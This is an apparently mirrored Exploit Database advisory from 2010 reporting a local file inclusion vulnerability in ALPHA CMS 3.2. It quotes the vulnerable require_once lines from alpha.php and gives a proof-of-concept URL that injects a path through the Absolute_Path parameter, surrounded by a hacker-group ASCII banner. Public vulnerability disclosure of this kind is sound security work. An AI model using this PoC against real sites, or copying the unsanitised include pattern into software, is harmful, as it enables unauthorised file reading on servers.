ALPHA CMS – Local File Inclusion

• Exploit Database
• 112 阅读

• 作者： eidelweiss
  日期： 2010-04-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11995/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74

  ######################################################## fucking the Web Apps [attack edition] __________ /\_<code>\ /\ \__/\ \__/\ \ \ \ \L\_\_______\ \ \/&apos;\ /\_\_____\ \ ,_\ \ \_____ \ \_\/\ \/\ \/&apos;___\ \ , < \/\ \ /&apos; _ </code>\/&apos;_ <code>\ \ \ \/\ \_ </code>\/&apos;__<code>\ \ \ \/\ \ \_\ \/\ \__/\ \ \</code>\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\__/ \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\ \/_/\/___/\/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/ /\____/ \_/__/ ____________ Hack0wn! Security Project /\ \__/\ \/\ \/\_\ \ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \_____ _____ ____ \ \ \ \ \ \ \/&apos;__<code>\ \ &apos;__</code>\ \ \__ \/\ &apos;__<code>\/\ &apos;__</code>\/&apos;,__\ \ \ \_/ \_\ \/\__/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, <code>\ \ </code>\___x___/\ \____\\ \_,__/\ \_\ \_\ \ ,__/\ \ ,__/\/\____/ &apos;\/__//__/\/____/ \/___/\/_/\/_/\ \ \/\ \ \/\/___/ \ \_\ \ \_\ \/_/\/_/     [+]Title : ALPHA CMS Local File Inclusion Vulnerability [+]Version: 3.2 [+]Download: http://sourceforge.net/projects/alpha-cms/files/ [+]Author: eidelweiss [+]Metode: Local File Inclusion [+]CWE: 22   [*]Special to Syabilla_putri (I miss u so much to)[*]   [!]Thank`s Fly To:   [~] Jose Luis Gongora Fernandez a.k.a JosS - sp3x (securityreason) [~] exploit-db team [~] Inj3ct0r.com r0073r & 0x1D [Inj3ct0r Exploit Database] - [D]eal [C]yber     ########################################################   Description:   ALPHA CMS is an A.P.I - free (Open Archiecture), MVC based Content Management System. ALPHA CMS architecture gives the ability to easily create advanced web pages, add-ons or even other CMS. ALPHA CMS is based on PHP, Smarty, JavaScript and MySQL.   -=[ Vuln C0de ]=-   [!] File name: alpha.php   // Create a new ALPHA CMS object $alpha = new ALPHA;   // Include DTBS class require_once($alpha->Absolute_Path() . &apos;db.php&apos;);   // Include CTRL class require_once($alpha->Absolute_Path() . &apos;controler.php&apos;);   // Include UTL class require_once($alpha->Absolute_Path() . &apos;utilities.php&apos;);   // Include STY class require_once($alpha->Absolute_Path() . &apos;smarty.php&apos;);     -=[ Proof Of Concept ]=-   http://127.0.0.1/alpha.php?Absolute_Path=[LFI]   ######################=[E0F]=#############################